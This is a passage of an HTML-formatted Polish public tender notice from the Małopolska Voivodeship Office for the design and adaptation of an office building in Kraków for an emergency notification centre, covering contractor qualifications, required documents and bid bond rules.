ustalić za pośrednictwem Platformy (por. pkt. 7 siwz).b) Zamawiający, działając na podstawie art. 93 ust. 1a ustawy zastrzega, iż może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które zamierza przeznaczyć na sfinansowanie zamówienia, nie zostaną mu przyznane. c) Wybrany wykonawca zobowiązany będzie do posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 5 000 000,00 złotych przez cały okres obowiązywania umowy. Kopia polisy lub innego dokumentu potwierdzającego posiadanie ubezpieczenia (potwierdzona za zgodność z oryginałem przez osobę upoważnioną do reprezentowania Wykonawcy) musi zostać dostarczona do Zamawiającego przed podpisaniem umowy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71220000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71240000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71250000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45453000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45100000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45200000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45400000-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust.1 pkt 6 ustawy, zwanych dalej „zamówieniami uzupełniającymi”:a) miejsce wykonania zamówień uzupełniających: budynek przy ul. Szlak 73A w Krakowie położony na działce nr 47/24 obr. 118 oraz działka nr 47/18 obr. 118.b) zakres zamówień uzupełniających:Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 PZP. Będą one polegać na powtórzeniu podobnych robót budowlanych i usług projektowych, objętych przedmiotem zamówienia podstawowego w zakresie pokrywającym się z zakresem zamówienia podstawowego, tj. prace projektowe i roboty budowlane zmierzające do kompleksowej wielobranżowej adaptacji budynku przy ul. Szlak 73A w Krakowie o powierzchni około 1400 m2 wraz z zagospodarowaniem terenu o powierzchni ok. 1700 m2, polegające na kompleksowej wielobranżowej przebudowie i rozbudowie budynku/kondygnacji dla celów biurowych. Roboty te będą polegać w szczególności na kompleksowych robotach ogólnobudowlanych, w tym wykończeniowych, przebudowie wewnętrznego układu drogowego wraz z budową naziemnych miejsc postojowych, robotach w zakresie instalacji wewnętrznych budynku (elektryczne, sanitarne, teletechniczne), przebudowie lub budowie przyłączy mediów, robotach w zakresie zagospodarowania terenu, w tym budowie i wyposażeniu obiektów pomocniczych- budynki i obiekty techniczne, np. budynku generatora prądu, zwiększeniu ilości urządzeń technicznych lub budowlanych, służących obsłudze obiektu. c) przewidywana wartość zamówień uzupełniających: do 50% wartości zamówienia podstawowego.d) Zamówienie będzie udzielone na następujących warunkach: dysponowanie doświadczeniem i osobami zdolnymi do wykonania zamówienia (zdolność techniczna lub zawodowa), ubezpieczenie od odpowiedzialności cywilnej, warunki zabezpieczenia należytej realizacji umowy, zasady odbioru prac projektowych i/lub robót, warunki korzystania z podwykonawców, okres oraz zasady gwarancji i rękojmi - na warunkach analogicznych, jak w umowie na zamówienie podstawowe, która będzie stanowić podstawę do negocjacji warunków do udzielenia zamówienia.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">18</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>18</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin wykonania zamówienia: 18 miesięcy od dnia zawarcia umowy. Termin realizacji zamówienia oznacza zakończenie i odbiór robót oraz uzyskanie ostatecznego pozwolenia na użytkowanie budynku. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:1) dysponują/będą dysponować osobami zdolnymi do wykonywania zamówienia, w tym:Dla zakresu prac projektowych i uzyskania prawomocnego pozwolenia na budowę:a) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności architektonicznej bez ograniczeń, uprawniającymi do projektowania, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego, b) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności konstrukcyjno – budowlanej bez ograniczeń, uprawniającymi do projektowania, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego, c) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, uprawniającymi do projektowania, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego, d) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, uprawniającymi do projektowania, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego, e) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń teletechnicznych bez ograniczeń, uprawniającymi do projektowania, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego. Dla zakresu realizacji robót budowlanych:f) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności konstrukcyjno – budowlanej lub architektonicznej bez ograniczeń, uprawniającymi do kierowania robotami budowlanymi, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego, g) minimum 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, uprawniającymi do kierowania robotami budowlanymi, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego, h) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, uprawniającymi do kierowania robotami budowlanymi, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego, i) minimum 1 osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń teletechnicznych bez ograniczeń, uprawniającymi do kierowania robotami budowlanymi, wraz z aktualnym wpisem na listę właściwego samorządu zawodowego.UWAGA!- Ilekroć Zamawiający wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy Prawo budowlane, rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).- Ilekroć Zamawiający wymaga osób z aktualnym wpisem na listę właściwego samorządu zawodowego, rozumie przez to osoby zrzeszone we właściwych izbach architektów lub inżynierów budownictwa i wpisane na listę członków właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów i inżynierów budownictwa (Dz. U. z 2019 r., poz. 1117 tj. z późn. zm.) oraz spełniające warunki określone w rozporządzeniu Ministra Infrastruktury i Rozwoju w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie, rozumie przez to Rozporządzenie Ministra Infrastruktury i Rozwoju w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 r. (Dz. U. z 2019 r., poz. 831).- Zamawiający dopuszcza możliwość, iż jedna osoba posiada uprawnienia budowlane do pełnienia samodzielnych funkcji w budownictwie w danej specjalności/specjalizacji, uprawniające zarówno do projektowania, jak i do kierowania robotami budowlanymi. Ponadto Zamawiający dopuszcza możliwość, że jedna osoba posiada uprawnienia budowlane więcej niż jednej branży, spośród wymaganych w niniejszym zamówieniu.2) posiadają doświadczenie w realizacji prac ogólnobudowlanych, w tym wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane polegające na budowie, nadbudowie lub rozbudowie budynku użyteczności publicznej o powierzchni całkowitej nie mniejszej niż 1 000,00 m² każda z robót, przy czym co najmniej jedna z tych robót budowlanych winna być wykonana w formule „zaprojektuj i wybuduj”.UWAGA! −	w przypadku nadbudowy lub rozbudowy Zamawiający wymaga, aby powierzchnia całkowita części nadbudowywanej lub rozbudowywanej budynku użyteczności publicznej wynosiła co najmniej 1 000,00 m2. Zamawiający uzna powyższy warunek za spełniony również w przypadku, gdy roboty budowlane polegały jednocześnie na częściowej przebudowie budynku i częściowej jego nadbudowie lub rozbudowie, a łączna powierzchnia objęta tymi robotami budowlanymi wynosi co najmniej 1 000,00 m2.−	pojęcia użyte powyżej, tj. budowa, nadbudowa, rozbudowa, przebudowa należy definiować zgodnie z art. 3 ustawy Prawo budowlane.−	pod pojęciem „budynku użyteczności publicznej” Zamawiający rozumie budynki użyteczności publicznej zgodnie z definicją zawartą w § 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2019 r., poz. 1065, j.t. z późn. zm.), z wyłączeniem obiektów o konstrukcji stalowej lub z prefabrykatów wielkogabarytowych typu hale stałe, systemowe, magazyny. Zamawiający za „budynek użyteczności publicznej” uznaje również budynek biurowy, natomiast wyłączeniu podlegają garaże, myjnie samochodowe oraz parkingi wielopoziomowe.−	pod pojęciem „zaprojektuj i wybuduj” Zamawiający rozumie opracowanie projektu budowlanego i wykonawczego we wszystkich branżach zgodnie z obowiązującymi przepisami w tym zakresie. Zaprojektowanie od podstaw czyli od pomysłu do wykonania dokumentacji budowlanej i wykonawczej, uzyskanie decyzji administracyjnych zezwalających na realizacje prac, wykonanie prac budowlanych związanych z budową obiektu wg dokumentacji, uzyskanie decyzji o Pozwoleniu na użytkowanie. Zamawiający nie uzna spełnienia warunku wykonania dokumentacji w przypadku adaptacji dokumentacji typowej lub istniejącej. Uwaga! Zamawiający nie dopuszcza łączenia doświadczenia (wykazania zamówień wykonanych przez dwa różne podmioty) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia lub w sytuacji polegania na zasobach innych podmiotów. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek winien spełniać co najmniej jeden z tych wykonawców.Oznacza to, że co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi posiadać doświadczenie polegające na wykonaniu co najmniej 2 zamówień polegających na budowie, nadbudowie lub rozbudowie budynku użyteczności publicznej o powierzchni całkowitej nie mniejszej niż 1 000,00 m² każda z robót, przy czym co najmniej jedna z tych robót winna być wykonana w formule „zaprojektuj i wybuduj”.W przypadku polegania na zasobach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu, doświadczenie polegające na wykonaniu co najmniej 2 zamówień spełniających powyższe wymogi, musi zostać wykazane odpowiednio dla podmiotu, który będzie realizował zamówienie. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1)	Wykonawca, w terminie 3 dni od dnia zamieszczenia na Platformie informacji, o której mowa w art. 86 ust. 5 ustawy (informacja z otwarcia ofert), przekazuje zamawiającemu za pośrednictwem Platformy oświadczenie (podpisane przez osobę upoważnioną do reprezentowania Wykonawcy) o przynależności lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369 z późn. zm.).2)	Ww. oświadczenie nie będzie wymagane w przypadku złożenia w postępowaniu tylko jednej oferty.3)	W przypadku gdy wykonawca nie należy do żadnej grupy kapitałowej, oświadczenie o braku przynależności do grupy kapitałowej (o przykładowej treści: „nie należę/-ymy do żadnej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów”) można złożyć wraz z ofertą, przy czym jakakolwiek zmiana sytuacji wykonawcy w toku postępowania (włączenie do grupy kapitałowej) powoduje obowiązek aktualizacji takiego oświadczenia po stronie wykonawcy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykonawca, którego oferta zostanie oceniona najwyżej (jako najkorzystniejsza) zostanie wezwany do złożenia za pośrednictwem Platformy przed udzieleniem zamówienia - w wyznaczonym terminie nie krótszym niż 5 dni - aktualnych oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, tj.:1) „wykazu osób” skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami oraz oświadczeniem, że osoby które będą uczestniczyć w wykonywaniu zamówienia, wymienione w wykazie, posiadają wymagane kwalifikacje zawodowe określone w pkt. 5.1.1) siwz.2) „wykazu robót budowlanych” wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów na rzecz których te roboty zostały wykonane.„Wykaz robót budowlanych” musi uwzględniać co najmniej 2 roboty budowlane polegające na budowie, nadbudowie lub rozbudowie budynku użyteczności publicznej o powierzchni całkowitej nie mniejszej niż 1 000,00 m² każda z robót, przy czym co najmniej jedna z tych robót budowlanych winna być wykonana w formule „zaprojektuj i wybuduj”.3) dowodów dotyczących robót wykazanych w wykazie o którym mowa powyżej, określających, czy roboty te zostały wykonane należycie, w szczególności czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.Dowodami o których mowa powyżej są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane, a jeśli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">W terminie wyznaczonym na składanie ofert, Wykonawca jest zobowiązany złożyć za pośrednictwem Platformy pod adresem https://muw.ezamawiajacy.pl, w zakładce „OFERTY”, podpisane przez osoby uprawnione kwalifikowanym podpisem elektronicznym, następujące dokumenty:1)	formularz oferty, wypełniony wg wzoru stanowiącego załącznik nr 2 do siwz,2)	pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub centralnej ewidencji i informacji o działalności gospodarczej.3)	aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia. Oświadczenie należy złożyć wg wzoru stanowiącego załącznik nr 3 do siwz. 4)	aktualne na dzień składania ofert oświadczenie potwierdzające, że wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia. Oświadczenie należy złożyć wg wzoru stanowiącego załącznik nr 4 do siwz.5)	JEŻELI DOTYCZY - zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inne dokumenty potwierdzające, że Wykonawca będzie dysponował niezbędnymi zasobami tych podmiotów przy realizacji zamówienia.UWAGA! Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza także informacje o tych podmiotach w oświadczeniach o których mowa w pkt. 3 i 4.Jeżeli zdolności techniczne lub zawodowe innego podmiotu nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający zażąda, aby wykonawca w terminie określonym przez zamawiającego:- zastąpił ten podmiot innym podmiotem lub podmiotami lub- zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże, że spełnia warunki w postępowaniu w wymaganym przez zamawiającego zakresie.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia o których mowa w pkt 3 i 4 (o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu wykluczeniu z postępowania) składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.6)	potwierdzenie wniesienia wadium - w przypadku wniesienia wadium w postaci pieniężnej lub oryginał dokumentu potwierdzającego wniesienie wadium - w przypadku wnoszenia wadium w innej formie niż pieniężnej, z zastrzeżeniem pkt 9.2 siwz.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wymagania dotyczące wadium1. W niniejszym postępowaniu wymaga się wniesienia wadium w wysokości: 150 000,00 zł. Wadium wnosi się przed upływem terminu składania ofert. Jeśli wadium jest wnoszone w formie przelewu na rachunek bankowy, musi znajdować się na koncie zamawiającego przed upływem terminu składania ofert.2. Wadium może być wniesione w jednej lub kilku z następujących form:1) w pieniądzu - przelewem na rachunek depozytowy Małopolskiego Urzędu Wojewódzkiego w Krakowie: Narodowy Bank Polski nr 94 1010 1270 0051 2213 9120 0000 z dopiskiem „WL-IV.272.11.2020 wadium – zaprojektowanie i wykonanie adaptacji budynku biurowego przy ul. Szlak 73A w Krakowie dla potrzeb Centrum Powiadamiania Ratunkowego”,2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020 r. poz. 299) – w formie elektronicznej poprzez zamieszczenie na Platformie, w zakładce „OFERTY” oryginału dokumentu wadialnego, opatrzonego kwalifikowanym podpisem elektronicznym osób uprawnionych do jego wystawienia, tj. przez gwaranta – wystawcę tego dokumentu. Beneficjentem wadium jest Małopolski Urząd Wojewódzki w Krakowie. Wadium powinno być oznaczone w następujący sposób: „WL-IV.272.11.2020 wadium – zaprojektowanie i wykonanie adaptacji budynku biurowego przy ul. Szlak 73A w Krakowie dla potrzeb Centrum Powiadamiania Ratunkowego”, tj. w sposób umożliwiający identyfikację postępowania, którego dotyczy.3. Dopuszczalne jest złożenie wadium w jednej lub więcej niż jednej formie.4. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:- być wystawione na Małopolski Urząd Wojewódzki w Krakowie, ul. Basztowa 22, 31-156 Kraków,- zawierać w treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4 a i 5 ustawy,- okres ważności wadium nie może być krótszy niż okres związania ofertą.5. Zamawiający zwróci wadium w przypadkach wymienionych w art. 46 ust. 1, 1a i 2 ustawy. W przypadku wpłaty przelewem Zamawiający zwróci kwotę wadium wraz z odsetkami wynikającymi z umowy prowadzenia rachunku depozytowego, pomniejszoną o koszty prowadzenia rachunku oraz prowizje bankowe. 6. Zamawiający odrzuci ofertę Wykonawcy, który nie wniesie wymaganego wadium lub wniesie wadium w sposób nieprawidłowy.7. Zamawiający zatrzymuje wadium w przypadkach określonych w art. 46 ust. 4 a i ust. 5 ustawy. </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się 